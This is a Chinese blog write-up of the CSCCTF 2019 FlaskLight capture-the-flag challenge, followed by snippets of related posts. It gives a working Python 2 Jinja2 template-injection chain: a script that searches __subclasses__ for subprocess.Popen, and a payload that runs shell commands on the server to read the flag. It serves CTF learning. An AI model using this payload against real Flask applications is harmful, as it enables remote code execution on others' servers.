[CSCCTF 2019 Qual]FlaskLight 记录
这个根据题目名字,flask模板注入,找注入点
查看源码发现GET传参
直接测试模板注入
常规模板注入
试了试之前做过的模板注入,都行不通
然后百度了一波,原来这是python2的
难怪不行
{{''.__class__.__mro__[2].__subclasses__()}}
利用这个可以读取所有的类,然后看看能不能RCE
找到catch_warnings类,
但是无法RCE
看了wp,发现可以利用subprocess.Popen这个类来进行RCE
学废了
网上搜的模板注入,都没说这个类,emmmm
找索引
import requests
import html
import timefor i in range(0,300):time.sleep(0.06)url='http://4d0aed10-26a2-4108-8b17-9c8aa555ca2d.node3.buuoj.cn?search={{\'\'.__class__.__mro__[2].__subclasses__()[%d]}}' %(i)r = requests.get(url)print(url)if "subprocess.Popen" in html.unescape(r.text):print(i)break
索引为258
payload
{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
查看flasklight目录
另外一个就是flag
[CSCCTF 2019 Qual]FlaskLight 记录相关推荐
- 一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
目录 SSTI 无二次渲染的示例 存在二次渲染的示例 漏洞复现 [CSCCTF 2019 Qual]FlaskLight 做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是 ...
- [CSCCTF 2019 Qual] FlaskLight
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程 ...
- [CSCCTF 2019 Qual]FlaskLight——直取flag?
[CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场.这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强 ...
- ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.n ...
- BUUCTF:[CSCCTF 2019 Qual]FlaskLight
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?searc ...
- [CSCCTF 2019 Qual]FlaskLight SSTI注入
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49 ...
- Good Bye 2019补题记录
Good Bye 2019补题记录 A. Card Game 题目描述 Two players decided to play one interesting card game. There is ...
- 【读书】2019年阅读记录
主要记录个人今年的阅读情况,以及部分带有强烈主观思想的读书笔记输出(按大致的时间顺序).如果有好书,请给我分享快乐哦~ 阅读工具:微信阅读(90%).Kindle(最近拾起,并在家使用) 备注:什么心 ...
- 2019年读书记录及总结
时间戳: 阅读方式: 所得所想: 1.<图解HTTP协议>作者:不详 时间戳:2019.0601--20190801 阅读方式:PC端读完第一遍 所得所想:对HTTP协议及请求行.请求头. ...
最新文章
- Permission denied (publickey). fatal: Could not read from remote repository.
- jbehave_使用JBehave,Gradle和Jenkins的行为驱动开发(BDD)
- c语言主调函数和被调函数,在C语言中,何为主调函数和被调函数,他们之 – 手机爱问...
- linux系统无法识别固态硬盘_linux查看硬盘是不是ssd
- 【渝粤题库】陕西师范大学292081 管理学基础 作业(高起专)
- windows CA的几点记录小结
- 阶段1 语言基础+高级_1-3-Java语言高级_05-异常与多线程_第6节 Lambda表达式_6_Lambda表达式有参数有返回值的...
- 删改数据如何避免锁表?等等,啥是锁呀
- 系统集成项目管理工程师知识点
- 智能硬件再下一城:家居
- estore简版商城
- 常用模板 UPD12/4
- 【云原生之Docker实战】使用Docker部署OpenKM文档管理系统
- ping命令和查找计算机,ping命令查网速,电脑测网速ping命令
- 有机合成化学类毕业论文文献(推荐10篇)
- 解决Win10 无线显示器功能安装时失败
- uml的九种图例分析
- 数据库中LIMIT和 OFFSET的理解
- 淘宝天猫商家运营,宝贝标题如何突出卖点,标题编写方法小技巧
- Web安全—脚本木马工作原理(持续更新)